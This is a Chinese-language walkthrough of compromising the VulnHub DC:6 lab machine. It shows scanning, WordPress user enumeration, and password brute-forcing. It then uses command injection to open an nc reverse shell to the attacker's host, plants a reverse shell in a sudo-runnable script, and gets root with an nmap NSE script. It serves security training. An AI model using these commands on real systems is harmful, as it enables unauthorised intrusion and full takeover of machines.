vulnhub-DC:6靶机渗透记录

准备工作

在vulnhub官网下载DC:6靶机DC: 6 ~ VulnHub

导入到vmware，设置成NAT模式

打开kali准备进行渗透（ip：192.168.200.6）

信息收集

利用nmap进行ip端口探测

nmap -sS 192.168.200.6/24

探测到ip为192.168.200.17的靶机，开放了80端口和22端口

再用nmap对所有端口进行探测，确保没有别的遗漏信息　　

nmap -sV -p- 192.168.200.17

先看看80端口，一直打不开，重定向到了wordy，像DC：2的方法一样操作，修改host文件

vi /etc/hosts

和dc：2的界面一模一样框架也是 WordPress

dirsearch扫描也扫到了/wp-login.php后台登陆页面

接下来和dc：2的操作基本一致

wpscan扫描

使用kali自带的工具wpscan（wordpress框架专门的漏洞扫描工具）列举出所有用户　　

wpscan --url http://wordy/ -e u

爆出五个用户 admin、jens、graham、mark、sarah，保存下来待会进行爆破

但是用了很多字典都爆破不出来，不知道怎么办的时候才发现在下载地址处的最下面给了线索DC: 6 ~ VulnHub

先cd到/usr/share/wordlists/这个目录，因为rockyou这个文件没有解压不能直接打开

gunzip rockyou.txt.gz　　

再返回桌面执行作者给的命令

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

直接使用wordy进行爆破

wpscan --url http://wordy/ -U user -P passwords.txt

爆到用户名mark 密码helpdesk01

nc反弹shell

登陆到刚刚的后台页面，在这里找到了命令执行的地方，试了一下127.0.0.1|ls 发现有漏洞可以执行任意命令，那就可以反弹shell到kali上

使用nc反弹shell，但是那个框有字数限制，用bp抓一下再放出去就解决了

nc -e /bin/bash 192.168.200.6 9999

再使用python 通过pty.spawn()获得交互式shell

python -c'import pty;pty.spawn("/bin/bash")'

root没有权限进不去，但是在home里发现了四个用户，在mark用户发现了一个txt文件，里面有graham的密码 GSo7isUM1D4

使用su切换成graham，看看graham的权限

发现jens下的backups.sh可以不用密码执行，可以用来获取jens的权限

这里有两种方法第一种是写入/bin/bash/，然后以jens的用户来执行文件直接获取权限

这里我记录第二种方法，写入nc命令，然后在另一端监听nc -lvf 9999，最后在以jens用户执行sh文件，再使用python 通过pty.spawn()获得交互式shell，两种方法思路都差不多

echo 'nc 192.168.200.6 9999 -e /bin/bash' > backups.sh　

sudo -u jens /home/jens/backups.sh

python -c'import pty;pty.spawn("/bin/bash")'

在看看jens的权限sudo -l

发现root权限namp无需密码，利用这个文件提权

权限提升

namp有执行脚本的功能，那就可以写一个执行bash的脚本文件，通过namp执行来提权

echo 'os.execute("/bin/sh")' > getroot.nse   //nes脚本后缀

sudo nmap --script=/home/jens/getroot.nse   //namp执行

DONE

参考文章

靶机DC-6_sm1rk的博客-CSDN博客